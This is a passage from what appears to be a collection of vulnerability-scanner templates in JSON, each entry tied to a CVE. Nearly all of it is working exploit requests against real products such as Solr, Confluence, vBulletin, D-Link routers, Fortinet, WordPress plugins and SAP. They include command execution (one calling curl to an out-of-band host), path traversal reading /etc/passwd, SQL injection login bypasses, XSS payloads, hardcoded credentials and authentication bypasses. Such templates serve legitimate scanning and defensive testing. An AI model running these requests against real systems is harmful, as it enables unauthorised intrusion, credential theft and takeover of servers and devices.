XMLHttpRequest\n\ncommand=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2019-10098","info":{"name":"Apache HTTP server v2.4.0 to v2.4.39 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/http%3A%2F%2Fwww.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2019-0221","info":{"name":"Apache Tomcat - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/printenv.shtml?{{url_encode(payload)}}","{{BaseURL}}/ssi/printenv.shtml?{{url_encode(payload)}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["QUERY_STRING_UNESCAPED={{payload}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20141","info":{"name":"WordPress Laborator Neon Theme 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/data/autosuggest-remote.php?q=\"><img%20src=x%20onerror=alert(1)>","{{BaseURL}}/admin/data/autosuggest-remote.php?q=\"><img%20src=x%20onerror=alert(1)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><img src=x onerror=alert(1)>>)1(trela=rorreno"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2019-10092","info":{"name":"Apache HTTP Server <=2.4.39 -  HTML Injection/Partial Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5cgoogle.com/evil.html"],"matchers-condition":"and","matchers":[{"type":"word","words":["Proxy Error"]},{"type":"word","words":["<a href=\"/\\google.com/evil.html\">"]}]}]},{"id":"CVE-2019-9618","info":{"name":"WordPress GraceMedia Media Player 1.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2019-3398","info":{"name":"Atlassian Confluence Download Attachments - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /dologin.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nos_username={{username}}&os_password={{password}}&login=Log%2Bin&os_destination=\n","GET /pages/createpage.action HTTP/1.1\nHost: {{Hostname}}\n","POST /plugins/drag-and-drop/upload.action?draftId={{draftID}}&filename=../../../../../../opt/atlassian/confluence/confluence/pages/{{randstr}}.jsp&size=8&mimeType=text%2Fplain&atl_token={{csrftoken}} HTTP/1.1\nHost: {{Hostname}}\n\n${{{num1}}*{{num2}}}\n","GET /pages/downloadallattachments.action?pageId={{draftID}} HTTP/1.1\nHost: {{Hostname}}\n","GET /pages/{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body_5","words":["{{result}}"]}],"extractors":[{"type":"regex","name":"csrftoken","group":1,"regex":["name=\"atlassian\\-token\" content=\"([a-z0-9]+)\"> "],"internal":true,"part":"body"},{"type":"regex","name":"draftID","group":1,"regex":["ta name=\"ajs\\-draft\\-id\" content=\"([0-9]+)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-11581","info":{"name":"Atlassian Jira Server-Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ContactAdministrators!default.jspa"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Contact Site Administrators"]},{"type":"word","part":"body","negative":true,"words":["has not yet configured this contact form"]},{"type":"regex","part":"body","regex":["\\(v4\\.4\\.","\\(v5\\.","\\(v6\\.","\\(v7\\.[012345789]\\.","\\(v7\\.1[0-2]\\.","\\(v7\\.6\\.([0-9]|[1][0-3])","\\(v7\\.\\13\\.[0-4]","\\(v8\\.0\\.[0-2]","\\(v8\\.1\\.[0-1]","\\(v8\\.2\\.[0-2]"],"condition":"or"}]}]},{"id":"CVE-2019-0230","info":{"name":"Apache Struts <=2.5.20 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?id={{str}}%25{128*128}"],"matchers":[{"type":"word","part":"body","words":["{{str}}16384"]}]}]},{"id":"CVE-2019-17418","info":{"name":"MetInfo 7.0.0 beta - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["43865094559"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10475","info":{"name":"Jenkins build-metrics 1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1337)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20183","info":{"name":"Simple Employee Records System 1.0 - Unrestricted File Upload","severity":"high"},"requests":[{"raw":["POST /dashboard/uploadID.php HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337\n\n-----------------------------5825462663702204104870787337\nContent-Disposition: form-data; name=\"employee_ID\"; filename=\"poc.php\"\nContent-Type: image/png\n\n<?php\necho md5('CVE-2019-20183');\nunlink(__FILE__);\n?>\n-----------------------------5825462663702204104870787337--\n","GET /uploads/employees_ids/{{endpoint}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_2","words":["1ad0d710225c472cb7396b3c1d97e4dd"]}],"extractors":[{"type":"regex","name":"endpoint","regex":["(?:[a-zA-Z0-9+\\/])*_poc.php"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-6112","info":{"name":"WordPress Sell Media 2.4.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sell-media-search/?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["id=\"sell-media-search-text\" class=\"sell-media-search-text\"","alert(1337)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16278","info":{"name":"nostromo 1.9.6 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1\nHost: {{Hostname}}\n\necho\necho\ncat /etc/passwd 2>&1\n"],"matchers":[{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2019-16759","info":{"name":"vBulletin 5.0.0-5.5.4 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsubWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20md5%28%22CVE-2019-16759%22%29%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["addcc9f9f2f40e2e6aca3079b73d9d17"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12593","info":{"name":"IceWarp Mail Server <=10.4.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini","{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd"],"matchers-condition":"and","matchers":[{"type":"word","words":["[intl]","root:x:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15811","info":{"name":"DomainMOD <=4.13.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","GET /reporting/domains/cost-by-month.php?daterange=%22onfocus=%22alert(document.domain)%22autofocus=%22 HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"value=\\\"\\\"onfocus=\\\"alert(document.domain)\\\"autofocus=\")","contains(body_2, \"DomainMOD\")"],"condition":"and"}]}]},{"id":"CVE-2019-15501","info":{"name":"L-Soft LISTSERV <16.5-2018a - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","LISTSERV"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18922","info":{"name":"Allied Telesis AT-GS950/8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20085","info":{"name":"TVT NVMS 1000 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\\[(font|extension|file)s\\]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12581","info":{"name":"Zyxel ZyWal/USG/UAG Devices - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/free_time_failed.cgi?err_msg=<script>alert(document.domain);</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>","Please contact with administrator."],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19985","info":{"name":"WordPress Email Subscribers & Newsletters <4.2.3 - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=download_report&report=users&status=all"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Name","Email","Status","Created On"],"condition":"and"},{"type":"word","part":"header","words":["Content-Disposition: attachment; filename=all-contacts.csv;"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-6799","info":{"name":"phpMyAdmin <4.8.5 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET {{path}}?pma_servername={{interactsh-url}}&pma_username={{randstr}}&pma_password={{randstr}}&server=1 HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"path":["/index.php","/pma/index.php","/pmd/index.php","/phpMyAdmin/index.php","/phpmyadmin/index.php","/_phpmyadmin/index.php"]},"attack":"batteringram","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 4.8.5')"]},{"type":"dsl","dsl":["compare_versions(version, '> 3.9.9')"]},{"type":"dsl","dsl":["compare_versions(phpversion, '< 7.3.4')"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","words":["mysqli_real_connect"]},{"type":"word","words":["pma_servername"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\\?v=([0-9.]+)"],"internal":true},{"type":"regex","group":1,"regex":["\\?v=([0-9.]+)"]},{"type":"regex","name":"phpversion","group":1,"regex":["X-Powered-By: PHP/([0-9.]+)"],"internal":true,"part":"header"}]}]},{"id":"CVE-2019-3911","info":{"name":"LabKey Server Community Edition <18.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/__r2/query-printRows.view?schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16920","info":{"name":"D-Link Routers - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}\n\nhtml_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384\n","POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}/login_pic.asp\nCookie: uid=1234123\n\nhtml_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}}\n","POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}/login_pic.asp\nCookie: uid=1234123\n\nhtml_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\\\Windows\\\\win.ini')}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3912","info":{"name":"LabKey Server Community Edition <18.3.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/labkey/__r1/login-login.view?returnUrl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2019-10692","info":{"name":"WordPress Google Maps <7.11.18 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"user_login\"","\"user_pass\"","\"user_nicename\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17538","info":{"name":"Jiangnan Online Judge 0.8.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2001-0537","info":{"name":"Cisco IOS HTTP Configuration - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/level/16/exec/show/config/CR"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["service config","Switch","default-gateway"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-37153","info":{"name":"Artica Proxy 4.30.000000 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /fw.login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuserfont=&artica-language=&StandardDropDown=&HTMLTITLE=&username=admin&password=admin%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Password\" value=\"admin\"><script>alert(document.domain)</script>","Artica Web"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-27984","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","@timeout: 20s\nPOST /templates/default/html/windows/right.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nmenu_filter=3'+AND+SLEEP(6)--+-&id=211&url=components%2Fmenu%2Fhtml%2Fedit.php&path=component%2Fmenu%2F%26menu_filter%3D3&uniqueClass=window_right_7526357\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"components/menu/classes/functions.php\")"],"condition":"and"}]}]},{"id":"CVE-2022-41412","info":{"name":"perfSONAR 4.x <= 4.4.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0599","info":{"name":"WordPress Mapping Multiple URLs Redirect Same Page <=5.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=mmursp-list&view=edit&mmursp_id=\"><svg/onload=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")"],"condition":"and"},{"type":"word","part":"body","words":["id=\"mmursp_id\" value=\"\\\"><svg/onload=alert(document.domain)>\" />"]}]}]},{"id":"CVE-2022-26138","info":{"name":"Atlassian Questions For Confluence - Hardcoded Credentials","severity":"critical"},"requests":[{"raw":["POST /dologin.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nos_username={{os_username}}&os_password={{os_password}}&login=Log+in&os_destination=%2Fhttpvoid.action\n"],"payloads":{"os_username":["disabledsystemuser"],"os_password":["disabled1system1user6708"]},"attack":"pitchfork","matchers":[{"type":"dsl","dsl":["location == \"/httpvoid.action\""]}]}]},{"id":"CVE-2022-40684","info":{"name":"Fortinet - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/v2/cmdb/system/admin HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Node.js\nForwarded: by=\"[127.0.0.1]:1337\";for=\"[127.0.0.1]:1337\";proto=http;host=\nX-Forwarded-Vdom: root\n","PUT /api/v2/cmdb/system/admin/admin HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Report Runner\nContent-Type: application/json\nForwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;\nContent-Length: 610\n\n {\n  \"ssh-public-key1\":\"{{randstr}}\"\n}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body_1","words":["ENC XXXX","http_method"],"condition":"and"},{"type":"word","part":"body_2","words":["Invalid SSH public key.","cli_error"],"condition":"and"}]}]},{"id":"CVE-2022-1768","info":{"name":"WordPress RSVPMaker <=9.3.2 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-json/rsvpmaker/v1/stripesuccess/anythinghere HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nrsvp_id=(select(0)from(select(sleep(7)))a)&amount=1234&email=randomtext\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=7"]},{"type":"word","part":"body","words":["\"payment_confirmation_message\":"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46071","info":{"name":"Helmet Store Showroom v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername='+OR+1%3D1+--+-&password=1234\n","GET /admin/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"Helmet Store\") && contains(body_2, \"Adminstrator Admin\")"],"condition":"and"}]}]},{"id":"CVE-2022-48197","info":{"name":"Yahoo User Interface library (YUI2) TreeView v2.8.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}{{paths}}"],"payloads":{"paths":["/libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["1'\"()&%<zzz><script>alert(document.domain)</script>","widget.TreeView"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22536","info":{"name":"SAP Memory Pipes (MPI) Desynchronization","severity":"critical"},"requests":[{"raw":["GET {{sap_path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 82646\nConnection: keep-alive\n\n{{repeat(\"A\", 82642)}}\n\nGET / HTTP/1.1\nHost: {{Hostname}}\n\n"],"payloads":{"sap_path":["/sap/admin/public/default.html","/sap/public/bc/ur/Login/assets/corbu/sap_logo.png"]},"stop-at-first-match":true,"unsafe":true,"read-all":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(tolower(body), 'administration')","contains(tolower(header), 'content-type: image/png')"],"condition":"or"},{"type":"word","part":"body","words":["HTTP/1.0 400 Bad Request","HTTP/1.0 500 Internal Server Error","HTTP/1.0 500 Dispatching Error"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0658","info":{"name":"CommonsBooking < 2.6.8 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=calendar_data&sd=2099-02-13&ed=2099-02-13&item=1&location=(SELECT+1743+FROM+(SELECT(SLEEP(6)))iXxL3)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"application/json\")","contains(body, \"partiallyBookedDays\") && contains(body, \"lockDays\")"],"condition":"and"}]}]},{"id":"CVE-2022-44957","info":{"name":"WebTareas 2.4p5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /general/login.php?session=false HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525\n\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"action\"\n\nlogin\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"loginForm\"\n\n{{username}}\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"passwordForm\"\n\n{{password}}\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"loginSubmit\"\n\nLog In\n-----------------------------3023071625140724693672385525--\n","GET /clients/editclient.php? HTTP/1.1\nHost: {{Hostname}}\n","POST /clients/editclient.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------34025600472463336623659912061\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"csrfToken\"\n\n{{csrf}}\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"action\"\n\nadd\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"cown\"\n\n1\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"cn\"\n\n{{randstr}}<details/open/ontoggle=alert(document.domain)>\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"add\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"zip\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"ct\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"cou\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"wp\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"fa\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"url\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"email\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"curr\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"wc\"\n\n1\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"pym\"\n\n1\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"pyt\"\n\n7\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"c\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"ssc\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"file1\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"attnam1\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; 